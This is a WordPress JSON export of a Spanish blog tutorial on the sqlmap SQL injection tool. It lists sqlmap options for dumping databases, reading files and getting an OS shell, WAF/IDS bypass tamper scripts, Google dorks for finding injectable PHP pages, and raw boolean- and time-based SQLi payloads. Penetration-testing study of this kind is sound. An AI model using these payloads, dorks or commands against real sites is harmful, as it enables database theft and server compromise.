{"id":236,"date":"2014-08-24T21:27:13","date_gmt":"2014-08-24T21:31:43","guid":{"rendered":"https:\/\/a6941sql-injection2.jpg"},"modified":"2015-07-16T17:06:02","modified_gmt":"2015-07-16T23:06:02","slug":"comandos-sqlmap-ataques-sqli-inyeccion-sql","status":"publish","type":"post","link":"https:\/\/emanuelpaxtian.com\/blog\/comandos-sqlmap-ataques-sqli-inyeccion-sql\/","title":{"rendered":"Comandos SQLmap: ataques SQLi &#8211; Inyecci\u00f3n SQL"},"content":{"rendered":"<p><strong>SQLmap<\/strong> es una de las herramienta m\u00e1s conocidas para hacer ataques SQLi (SQL Injection) escrita en Python. SQLmap se encarga de realizar peticiones a los par\u00e1metros de una URL que se le indiquen, ya sea mediante una petici\u00f3n GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de SQLi como union-base, time-base-blind, base-blind-injection, heavy-queries, etc.<\/p>\n<p>Permite realizar de manera autom\u00e1tica 6 t\u00e9cnicas de ataques:<\/p>\n<ul>\n<li>boolean-based blind<\/li>\n<li>time-based blind<\/li>\n<li>error-based<\/li>\n<li>UNION query<\/li>\n<li>stacked queries<\/li>\n<li>out-of-band<\/li>\n<\/ul>\n<h2>Tutorial &#8211;\u00a0 Manual Uso b\u00e1sico SQLmap<\/h2>\n<h4>Errores:<\/h4>\n<div>http:\/\/www.elhacker.net\/noticia.php?id=1&#8242;<\/p>\n<ul>\n<li>&#8211;dbms=mysql<\/li>\n<\/ul>\n<\/div>\n<blockquote class=\"tr_bq\"><p>[..] Error: You have an error in your SQL syntax [..]<\/p><\/blockquote>\n<blockquote class=\"tr_bq\"><p>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [..]<\/p><\/blockquote>\n<ul>\n<li>&#8211;dbms=mssql<\/li>\n<\/ul>\n<blockquote class=\"tr_bq\"><p>Microsoft OLE DB Provider for ODBC Drivers error [..]<\/p><\/blockquote>\n<blockquote class=\"tr_bq\"><p>Server Error in \u2018\/\u2019 Application. Unclosed quotation mark before the character string [..]<\/p><\/blockquote>\n<ul>\n<li>&#8211;dbms=orcale<\/li>\n<\/ul>\n<blockquote class=\"tr_bq\"><p>java.sql.SQLException: ORA-00933: SQL command not properly ended at [..]<\/p><\/blockquote>\n<p>Requisitos &#8211; Dependencias<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>Python 2.6 o 2.7 (no funciona con 3.0)<\/li>\n<li>gzip<\/li>\n<li>ssl<\/li>\n<li>sqlite3<\/li>\n<li>zlib<\/li>\n<\/ul>\n<p>Instalaci\u00f3n clonando el repositorio git<\/p>\n<blockquote class=\"tr_bq\">\n<pre>git clone git:\/\/github.com\/sqlmapproject\/sqlmap.git<\/pre>\n<pre>cd sqlmap<\/pre>\n<\/blockquote>\n<p>Uso:<\/p>\n<blockquote class=\"tr_bq\">\n<pre><code>python sqlmap.py [opciones]<\/code><\/pre>\n<\/blockquote>\n<p>&nbsp;<\/p>\n<ul>\n<li>&#8211;url\u00a0 url\u00a0 (-u) con la variable vulnerable ejemplo elhacker.net\/noticia.php?id=1<\/li>\n<li><strong>-p<\/strong>\u00a0(buscar otra variable vunlerable) elhacker.net\/noticia.php?id=1&amp;user<\/li>\n<li><strong>&#8211;data<\/strong>\u00a0si hay un formulario GET,POST los campos vulnerables<\/li>\n<li><strong><code>--<\/code>level=n\u00a0<\/strong>cinco niveles seg\u00fan dificultad<\/li>\n<li>&#8211;dbs\u00a0listar las bases de datos<\/li>\n<li><strong><code><\/code>&#8211;dbms<\/strong>\u00a0 motor de la base de datos (MySQL,SQL Server ,etc)<\/li>\n<li>\u00a0-D\u00a0indicamos la base de datos a utilizar (-Database)<\/li>\n<li>\u00a0&#8211;tables\u00a0mostrar las tablas disponibles<\/li>\n<li><strong>-t<\/strong>\u00a0nombre de la tabla\u00a0<strong>&#8211;columns<\/strong><\/li>\n<li><strong>&#8211;dump\u00a0<\/strong>vuelca resultados, mostrar contenido de las tablas<\/li>\n<li><strong>-C (Columnas)\u00a0<\/strong>columnas a mostrar<\/li>\n<li><strong>&#8211;wizard\u00a0<\/strong>ejecuta un asistente<\/li>\n<li><strong>\u00a0&#8211;threads=n<\/strong>\u00a0n\u00famero de procesos (por defecto 1)<\/li>\n<li><strong>&#8211;delay=n<\/strong>\u00a0segundos de espera entre peticiones http<\/li>\n<li><strong>&#8211;current-db<\/strong>\u00a0base de datos que est\u00e1 usando actualmente<\/li>\n<li><strong>&#8211;current-user\u00a0<\/strong>ver usuario que est\u00e1 ejecutando<\/li>\n<li><strong>&#8211;is-dba \u2013current-db\u00a0<\/strong>ver si el usuario es el dba de la BD<\/li>\n<li><strong>&#8211;privileges\u00a0<\/strong>ver los privilegios del usuario (alter, create, drop, execute)<\/li>\n<li>&#8212;<strong>file-read\u00a0<\/strong>path (ruta) leer ficheros<\/li>\n<li><strong>&#8211;sql-shell\u00a0<\/strong>obtener una sql en shell<\/li>\n<li><strong>&#8211;os-shell\u00a0<\/strong>obtener shell en el servidor (asp es la 1, aspx 2, jsp 3, php 4) (si se poseen los suficientes privilegios y un FPD (Full Path Disclosure)<\/li>\n<li>\u00a0<strong>&#8211;headers<\/strong>= cabeceras del navegador<\/li>\n<li><strong>&#8211;random-agent\u00a0<\/strong>cabeceras del navegador aleatorias<\/li>\n<li><strong>&#8211;time-sec<\/strong>= Segundos para retrasar la respuesta de DBMS (por defecto 5)<\/li>\n<li><strong>&#8212;technique=\u00a0<\/strong>: Se utiliza para seleccionar la t\u00e9cnica que se va a utilizar en la inyecci\u00f3n ( B &#8211; E &#8211; U &#8211; S &#8211; T &#8211; Q.) Boolean-based, Error-based, Union, Stacked querys, Time-based, Inline queries<\/li>\n<li><strong>&#8211;flush-session<\/strong><\/li>\n<\/ul>\n<div>&#8211; Si el SQLi es Blind Boolean Based , se especifica con una &#8220;B&#8221;<\/div>\n<div>&#8211; Si el SQLi es Error Based\/Double Query , se especifica con una &#8220;E&#8221;<\/div>\n<div>&#8211; Si el SQLi es Union Based , se especifica con una &#8220;U&#8221;<\/div>\n<div>&#8211; Si el SQLi es Stacked querys , se especifica con una &#8220;S&#8221;<br \/>\n&#8211; Si el SQLi es Time Based , se especifica con una &#8220;T&#8221;<\/div>\n<div>&#8211; Si el SQLi es Inline queries , se especifica con una &#8220;Q&#8221;<\/div>\n<ul>\n<li><strong>&#8211;forms\u00a0<\/strong>si queremos que busque autom\u00e1ticamente los campos de formularios<\/li>\n<li><strong>&#8211;proxy=\u00a0<\/strong>usar servidor proxy<\/li>\n<li><strong>&#8211;sql-query<\/strong>\u00a0a\u00f1adir consulta sql<\/li>\n<li><strong>&#8211;tamper<\/strong>= scripts ofuscaci\u00f3n y bypass (ejemplo space2mysqlblank.py, charencode.py, base64encode.py, randomcomments.py, etc)<\/li>\n<li><strong>&#8211;chek-tor<\/strong>\u00a0&#8212;&gt; User Tor Anonymity Network<\/li>\n<li><strong>&#8211;tor-port\u00a0<\/strong>&#8212;&gt; Set Tor proxy port other than default<\/li>\n<li><strong>&#8211;tor-type\u00a0<\/strong>&#8212;&gt; Set Tor proxy type (HTTP (default ), SOCKS4 or SOCKS5)<\/li>\n<\/ul>\n<p>Listado completo\u00a0 en la documentaci\u00f3n oficial:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\/wiki\/Usage\">https:\/\/github.com\/sqlmapproject\/sqlmap\/wiki\/Usage<\/a><\/li>\n<\/ul>\n<p><a href=\"https:\/\/github.com\/aramosf\/sqlmap-cheatsheet\/blob\/master\/sqlmap%20cheatsheet%20v1.0-SBD.pdf\"><strong>Descargar Cheatsheet para SQLMap<\/strong><\/a>\u00a0 cortes\u00eda de SecurityByDefault:<\/p>\n<p>SQLMap compara la p\u00e1gina sin ning\u00fan tipo inyecci\u00f3n con la p\u00e1gina con la inyecci\u00f3n y en funci\u00f3n de la variaci\u00f3n entre ellas devuelve True o False (True si supera determinado ratio y False en el caso contrario).<\/p>\n<p>Los siguientes car\u00e1cteres pueden ser usados despu\u00e9s de la inyecci\u00f3n SQL:<\/p>\n<blockquote class=\"tr_bq\">\n<table>\n<tbody>\n<tr>\n<td class=\"code\">#<\/td>\n<td>Hash comment<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">\/*<\/td>\n<td>C-style comment<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">&#8212; &#8211;<\/td>\n<td>SQL comment<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">;<\/td>\n<td>Nullbyte<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">`<\/td>\n<td>Backtick<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/blockquote>\n<p>Saber la versi\u00f3n del servidor SQL:<\/p>\n<p>Enumeraci\u00f3n.<\/p>\n<p>Con SQLMap:<\/p>\n<ul>\n<li><strong><code>--all<\/code><\/strong><\/li>\n<li><strong><code>-b<\/code><\/strong>\u00a0o\u00a0<code><strong>--banner<\/strong>\u00a0(versi\u00f3n)<\/code><\/li>\n<li><strong><code>--current-user<\/code><\/strong><\/li>\n<li><strong><code>--current-db<\/code><\/strong><\/li>\n<li><code><strong><code>--hostname<\/code><\/strong>\u00a0<\/code><\/li>\n<\/ul>\n<blockquote class=\"tr_bq\"><p>VERSION()<br \/>\n@@VERSION<br \/>\n@@GLOBAL.VERSION<\/p><\/blockquote>\n<p>Informaci\u00f3n relevante:<\/p>\n<blockquote class=\"tr_bq\"><p>@@HOSTNAME<br \/>\nUUID() &#8211;&gt; MAC address<\/p><\/blockquote>\n<p>Condicionales<\/p>\n<blockquote class=\"tr_bq\"><p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td class=\"code\">CASE<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">IF()<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">IFNULL()<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">NULLIF()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/blockquote>\n<p>Leyendo ficheros:<\/p>\n<p>Con SQLMap:<\/p>\n<ul>\n<li><strong><code>--file-read=<\/code><\/strong><\/li>\n<li><strong><code>--file-write=<\/code><\/strong><\/li>\n<li><strong><code>--file-dest=<\/code><\/strong><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<blockquote class=\"tr_bq\"><p>LOAD_FILE()<br \/>\nINTO OUTFILE\/DUMPFILE<\/p><\/blockquote>\n<p>Ofuscaci\u00f3n (Evadiendo filtros)<\/p>\n<blockquote class=\"tr_bq\"><p>09 Horizontal Tab<br \/>\n0A New Line<br \/>\n0B Vertical Tab<br \/>\n0C New Page<br \/>\n0D Carriage Return<br \/>\nA0 Non-breaking Space<br \/>\n20 Space<\/p><\/blockquote>\n<p>Car\u00e1cteres admitidos despu\u00e9s del AND\/OR<\/p>\n<blockquote class=\"tr_bq\"><p>20 Space<br \/>\n2B +<br \/>\n2D &#8211;<br \/>\n7E ~<br \/>\n21 !<br \/>\n40 @<\/p><\/blockquote>\n<h2>\u00a0Google Dorks<\/h2>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>-g<\/strong>\u00a0GOOGLEDORK<\/li>\n<\/ul>\n<p>Ejemplos:<\/p>\n<blockquote class=\"tr_bq\"><p>inurl:item_id=\u00a0 inurl:review.php?id=\u00a0 inurl:hosting_info.php?id=<br \/>\ninurl:newsid=\u00a0 inurl:iniziativa.php?in=\u00a0 inurl:gallery.php?id=<br \/>\ninurl:trainers.php?id=\u00a0 inurl:curriculum.php?id=\u00a0 inurl:rub.php?idr=<br \/>\ninurl:news-full.php?id=\u00a0 inurl:labels.php?id=\u00a0 inurl:view_faq.php?id=<br \/>\ninurl:news_display.php?getid=\u00a0 inurl:story.php?id=\u00a0 inurl:artikelinfo.php?id=<br \/>\ninurl:index2.php?option=\u00a0 inurl:look.php?ID=\u00a0 inurl:detail.php?ID=<br \/>\ninurl:readnews.php?id=\u00a0 inurl:newsone.php?id=\u00a0 inurl:index.php?=<br \/>\ninurl:top10.php?cat=\u00a0 inurl:aboutbook.php?id=\u00a0 inurl:profile_view.php?id=<br \/>\ninurl:newsone.php?id=\u00a0 inurl:material.php?id=\u00a0 inurl:category.php?id=<br \/>\ninurl:event.php?id=\u00a0 inurl:opinions.php?id=\u00a0 inurl:publications.php?id=<br \/>\ninurl:product-item.php?id=\u00a0 inurl:announce.php?id=\u00a0 inurl:fellows.php?id=<br \/>\ninurl:sql.php?id=\u00a0 inurl:rub.php?idr=\u00a0 inurl:downloads_info.php?id=<br \/>\ninurl:index.php?catid=\u00a0 inurl:galeri_info.php?l=\u00a0 inurl:prod_info.php?id=<br \/>\ninurl:news.php?catid=\u00a0 inurl:tekst.php?idt=\u00a0 inurl:shop.php?do=part&amp;id=<br \/>\ninurl:index.php?id=\u00a0 inurl:newscat.php?id=\u00a0 inurl:productinfo.php?id=<br \/>\ninurl:news.php?id=\u00a0 inurl:newsticker_info.php?idn=\u00a0 inurl:collectionitem.php?id=<br \/>\ninurl:index.php?id=\u00a0 inurl:rubrika.php?idr=\u00a0 inurl:band_info.php?id=<br \/>\ninurl:trainers.php?id=\u00a0 inurl:rubp.php?idr=\u00a0 inurl:product.php?id=<br \/>\ninurl:buy.php?category=\u00a0 inurl:offer.php?idf=\u00a0 inurl:releases.php?id=<br \/>\ninurl:article.php?ID=\u00a0 inurl:art.php?idm=\u00a0 inurl:ray.php?id=<br \/>\ninurl:play_old.php?id=\u00a0 inurl:title.php?id=\u00a0 inurl:produit.php?id=<br \/>\ninurl:declaration_more.php?decl_id=\u00a0 inurl:news_view.php?id=\u00a0 inurl:pop.php?id=<br \/>\ninurl:pageid=\u00a0 inurl:select_biblio.php?id=\u00a0 inurl:shopping.php?id=<br \/>\ninurl:games.php?id=\u00a0 inurl:humor.php?id=\u00a0 inurl:productdetail.php?id=<br \/>\ninurl:page.php?file=\u00a0 inurl:aboutbook.php?id=\u00a0 inurl:post.php?id=<br \/>\ninurl:newsDetail.php?id=\u00a0 inurl:ogl_inet.php?ogl_id=\u00a0 inurl:viewshowdetail.php?id=<br \/>\ninurl:gallery.php?id=\u00a0 inurl:fiche_spectacle.php?id=\u00a0 inurl:clubpage.php?id=<br \/>\ninurl:article.php?id=\u00a0 inurl:communique_detail.php?id=\u00a0 inurl:memberInfo.php?id=<br \/>\ninurl:show.php?id=\u00a0 inurl:sem.php3?id=\u00a0 inurl:section.php?id=<br \/>\ninurl:staff_id=\u00a0 inurl:kategorie.php4?id=\u00a0 inurl:theme.php?id=<br \/>\ninurl:newsitem.php?num=\u00a0 inurl:news.php?id=\u00a0 inurl:page.php?id=<br \/>\ninurl:readnews.php?id=\u00a0 inurl:index.php?id=\u00a0 inurl:shredder-categories.php?id=<br \/>\ninurl:top10.php?cat=\u00a0 inurl:faq2.php?id=\u00a0 inurl:tradeCategory.php?id=<br \/>\ninurl:historialeer.php?num=\u00a0 inurl:show_an.php?id=\u00a0 inurl:product_ranges_view.php?ID=<br \/>\ninurl:reagir.php?num=\u00a0 inurl:preview.php?id=\u00a0 inurl:shop_category.php?id=<br \/>\ninurl:Stray-Questions-View.php?num=\u00a0 inurl:loadpsb.php?id=\u00a0 inurl:transcript.php?id=<br \/>\ninurl:forum_bds.php?num=\u00a0 inurl:opinions.php?id=\u00a0 inurl:channel_id=<br \/>\ninurl:game.php?id=\u00a0 inurl:spr.php?id=\u00a0 inurl:aboutbook.php?id=<br \/>\ninurl:view_product.php?id=\u00a0 inurl:pages.php?id=\u00a0 inurl:preview.php?id=<br \/>\ninurl:newsone.php?id=\u00a0 inurl:announce.php?id=\u00a0 inurl:loadpsb.php?id=<br \/>\ninurl:sw_comment.php?id=\u00a0 inurl:clanek.php4?id=\u00a0 inurl:pages.php?id=<br \/>\ninurl:news.php?id=\u00a0 inurl:participant.php?id=\u00a0 inurl:avd_start.php?avd=\u00a0 inurl:download.php?id= inurl:event.php?id=\u00a0 inurl:main.php?id=\u00a0 inurl:product-item.php?id=\u00a0 inurl:review.php?id=\u00a0 inurl:sql.php?id=\u00a0 inurl:chappies.php?id=\u00a0 inurl:material.php?id=\u00a0 inurl:read.php?id=\u00a0 inurl:clanek.php4?id= inurl:prod_detail.php?id=\u00a0 inurl:announce.php?id=\u00a0 inurl:viewphoto.php?id=\u00a0 inurl:chappies.php?id= inurl:article.php?id=\u00a0 inurl:read.php?id=\u00a0 inurl:person.php?id=\u00a0 inurl:viewapp.php?id= inurl:productinfo.php?id=\u00a0 inurl:viewphoto.php?id=\u00a0 inurl:showimg.php?id=\u00a0 inurl:rub.php?idr= inurl:view.php?id=\u00a0 inurl:galeri_info.php?l=\u00a0 inurl:website.php?id=<\/p><\/blockquote>\n<h3>Bypass de WAF (Web Aplication Firewall) \/ IDS<\/h3>\n<p>Algunos scripts que nos permite de cierta forma poder realizar un bypass a ciertos WAF\/IDS como mod_security o suhosing. De esta manera podemos ocultar el playload. Estos scripts pertenecen a la herramienta SQLmap y se encuentran en la carpeta<strong>\u00a0Tamper.<\/strong><\/p>\n<ul>\n<li><strong>&#8211;tamper\u00a0<\/strong>: Se utiliza para seleccionar el tipo de manipulaci\u00f3n que se efectuar\u00e1 a la inyecci\u00f3n por parte del script que se selecciona a continuaci\u00f3n.<\/li>\n<\/ul>\n<ul>\n<li>apostrophemask.py<\/li>\n<li>percentage.py<\/li>\n<li>apostrophenullencode.py<\/li>\n<li>randomcase.py<\/li>\n<li>appendnullbyte.py<\/li>\n<li>randomcomments.py<\/li>\n<li>base64encode.py<\/li>\n<li>securesphere.py<\/li>\n<li>between.py<\/li>\n<li>space2comment.py<\/li>\n<li>bluecoat.py<\/li>\n<li>space2dash.py<\/li>\n<li>chardoubleencode.py<\/li>\n<li>space2hash.py<\/li>\n<li>charencode.py<\/li>\n<li>space2morehash.py<\/li>\n<li>charunicodeencode.py<\/li>\n<li>space2mssqlblank.py<\/li>\n<li>concat2concatws.py<\/li>\n<li>space2mssqlhash.py<\/li>\n<li>equaltolike.py<\/li>\n<li>space2mysqlblank.py<\/li>\n<li>greatest.py<\/li>\n<li>space2mysqldash.py<\/li>\n<li>halfversionedmorekeywords.py<\/li>\n<li>space2plus.py<\/li>\n<li>ifnull2ifisnull.py<\/li>\n<li>space2randomblank.py<\/li>\n<li>__init__.py<\/li>\n<li>sp_password.py<\/li>\n<li>lowercase.py<\/li>\n<li>unionalltounion.py<\/li>\n<li>modsecurityversioned.py<\/li>\n<li>unmagicquotes.py<\/li>\n<li>modsecurityzeroversioned.py<\/li>\n<li>versionedkeywords.py<\/li>\n<li>multiplespaces.py<\/li>\n<li>versionedmorekeywords.py<\/li>\n<li>nonrecursivereplacement.py<\/li>\n<\/ul>\n<p>Por ejemplo el tamper &#8220;space2morehash.py&#8221; cambian en la &#8220;URL encoded&#8221; las funciones CHAR(), USER(), CONCAT() por FUNCTION%23randomText%0A()<\/p>\n<p>space2hash.py, space2mysqlblank.py pueden ser usados cuando el motor es MySQLy charunicodeencode.py, percentage.py opara ofuscar el playload en motores ASP\/ASP.NET<\/p>\n<p>El script charencode nos puede ser muy \u00fatil cuando atacamos un sitio web protegido por un WAF,el cual tiene prohido el ingreso de ciertas palabras como puede ser el caso de\u00a0<strong>columns_name<\/strong>,\u00a0<strong>table_name<\/strong>,\u00a0<strong>group_concat<\/strong>, etc.<\/p>\n<ul>\n<li><strong>-v<\/strong>\u00a0: Es para seleccionar el nivel de esfuerzo por parte de la herramienta : 0-6 (por defecto toma el valor de 1)<\/li>\n<li><strong>&#8211;batch<\/strong>\u00a0: Sirve para que el usuario no tenga la necesidad de ingresar cualquier dato una vez iniciado las inyecciones(Se obvia el ingreso de Y\/N).<\/li>\n<li><strong>&#8211;risk<\/strong>\u00a0: Riesgo de pruebas que se desee realizar (0-3, por defecto toma el valor de 1)<\/li>\n<li><strong>&#8211;level<\/strong>\u00a0: Nivel de pruebas que desee realizar (1-5, por defecto toma el valor de 1)<\/li>\n<\/ul>\n<div><\/div>\n<div>\n<h2>Payloads<\/h2>\n<p>Los payloads se encuentran en formato xml: ejemplo de plantilla xml\/payloads.xml<\/p>\n<p><a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\/blob\/master\/xml\/payloads.xml\">https:\/\/github.com\/sqlmapproject\/sqlmap\/blob\/master\/xml\/payloads.xml<\/a><\/p>\n<p>Boolean based<\/p>\n<blockquote class=\"tr_bq\"><p>999999 or 1=1 or 1=1<br \/>\n&#8216; or 1=1 or &#8216;1&#8217;=&#8217;1<br \/>\n&#8221; or 1=1 or &#8220;1&#8221;=&#8221;1<br \/>\n999999) or 1=1 or (1=1<br \/>\n&#8216;) or 1=1 or (&#8216;1&#8217;=&#8217;1<br \/>\n&#8220;) or 1=1 or (&#8220;1&#8243;=&#8221;1<br \/>\n999999)) or 1=1 or ((1=1<br \/>\n&#8216;)) or 1=1 or ((&#8216;1&#8217;=&#8217;1<br \/>\n&#8220;)) or 1=1 or ((&#8220;1&#8243;=&#8221;1<br \/>\n999999))) or 1=1 or (((1<br \/>\n&#8216;))) or 1=1 or (((&#8216;1&#8217;=&#8217;1<br \/>\n&#8220;))) or 1=1 or (((&#8220;1&#8243;=&#8221;1<\/p><\/blockquote>\n<p>Time-based MySQL<\/p>\n<blockquote class=\"tr_bq\"><p>(select benchmark(15000000,md5(0x4e446b6e))-9999) as test<br \/>\nbenchmark(15000000,md5(0x4e446b6e))-9999<br \/>\n9999&#8242; or benchmark(15000000,md5(0x4e446b6e)) or &#8216;0&#8217;=&#8217;9999<br \/>\n9999&#8243; or benchmark(15000000,md5(0x4e446b6e)) or &#8220;0&#8221;=&#8221;9999<\/p><\/blockquote>\n<div>SQL Server (mssql)<\/div>\n<div><\/div>\n<div>\n<blockquote class=\"tr_bq\"><p>(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test<br \/>\n(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)<br \/>\n9999&#8217;+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+&#8217;9999<br \/>\n9999&#8243;+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+&#8221;9999<\/p><\/blockquote>\n<\/div>\n<div>\n<h2>Sqlmap plugin for BurpSuite<\/h2>\n<blockquote class=\"tr_bq\"><p>Cuando auditamos un sitio web lo primero que solemos hacer es poner un proxy intermedio para tener m\u00e1s control sobre lo que enviamos a \u00e9ste. Por diversos motivos utilizo el\u00a0<a href=\"http:\/\/portswigger.net\/burp\/\">BurpSuite<\/a>\u00a0como proxy.<br \/>\n\u00bfNo cre\u00e9is que ser\u00eda genial que cuando estamos auditando un sitio podamos redirigir una URL o petici\u00f3n concreta directamente al\u00a0<a href=\"http:\/\/sqlmap.sourceforge.net\/\">sqlmap<\/a>\u00a0con un simple\u00a0<em>click<\/em>\u00a0de rat\u00f3n? S\u00ed, \u00bfverdad? Eso creo yo tambi\u00e9n. Por esto he desarrollado este\u00a0<em>plugin<\/em>, para poder hacer justamente esto.<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>SQLmap es una de las herramienta m\u00e1s conocidas para hacer ataques SQLi (SQL Injection) escrita en Python. SQLmap se encarga de realizar peticiones a los par\u00e1metros de una URL que&hellip;<\/p>\n","protected":false},"author":1,"featured_media":713,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,10],"tags":[],"class_list":["post-236","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-seguridad"],"_links":{"self":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/comments?post=236"}],"version-history":[{"count":0,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/236\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media\/713"}],"wp:attachment":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media?parent=236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/categories?post=236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/tags?post=236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}